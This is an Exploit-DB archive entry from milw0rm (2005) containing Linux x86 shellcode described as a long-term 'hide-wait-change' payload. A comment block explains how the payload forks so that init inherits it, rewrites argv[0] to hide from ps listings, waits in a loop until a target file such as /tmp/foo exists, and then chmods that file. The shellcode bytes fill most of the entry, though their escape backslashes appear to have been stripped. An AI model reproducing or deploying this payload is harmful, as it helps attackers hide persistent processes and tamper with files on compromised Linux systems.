https://www.exploit-db.com/exploits/13411

漏洞细节尚未披露

/*----------------------------------------------------------------------------*
 *          [Mystique Project: Examples of long-term payloads]                *
 *                       hide-wait-change code                                *
 *                 by [email protected]  &  [email protected]                       *
 *----------------------------------------------------------------------------*
 * This code, upon execution, will perform the following things...            *
 *                                                                            *
 *   1) Fork a new process, and kill PPID via _exit() so we get inherrited    *
 *      by init and now have a new PID.                                       *
 *   2) Will obtain the current location of argv[0] by retrieving information *
 *      from /proc/self/stat.                                                 *
 *   3) Copy the name we wish to masquarade as into argv[0] in memory.        *
 *   4) Call setsid() to establish ourselfs as a process leader.              *
 *   5) Will sleep via nanosleep() for a givin interval of time.              *
 *   6) Will check to see if a file exist via access().                       *
 *   7) If it does not Loop back to step 5                                    *
 *   8) If it does then we chmod() the file with permissions 0455.            *
 *   9) Calls _exit()                                                         *
 *                                                                            *
 *  * steps 3-4 effectivly hide us from most ps-listings                      *
 *                                                                            *
 *   size: 187 + strlen(new-proc-name) + strlen(file-to-change)               *
 *----------------------------------------------------------------------------*/
	
char shellcode[]=
"x6ax02x58xcdx80x85xc0x74x79x31xc0x40xcdx80x5bx8d"
"x73x10xfex43x0fx99x31xc9xb0x05xcdx80x93x6ax03x58"
"xb2xfax89xe1x29xd1xcdx80x89xcfx01xc7x93xfdx6ax20"
"x58x6ax0ex59x87xcbxf2xaex87xcbxe2xf8x47x47x31xc0"
"x6ax0ax5bxfcx31xd2x8ax0fx83xe9x30x01xc8x47x80x3f"
"x20x74x04xf7xe3xebxedx94x5fx5fx94x57xb1xffx31xc0"
"xf3xaax5fx56x4ex46x41x80x3exffx75xf9xfex06x5exf3"
"xa4xb0x42xcdx80x89xf7x92x48x89xc1xf2xaexfex47xff"
"xffxe7xe8x87xffxffxff"
"/proc/self/statxff"                       // 
"xort and izik rocks the linux boxxff"     // new proc name
"/tmp/fooxff"                              // file to chmod
"x6a"                                      //
"x03"                                      // sleep-time
"x40x89xe1x89xe3x34xa2xcdx80x31xc9x89xf3x34x21xcd"
"x80x85xc0x75xebxb0x0fx66xb9x6dx09xcdx80x40xcdx80";

// milw0rm.com [2005-09-08]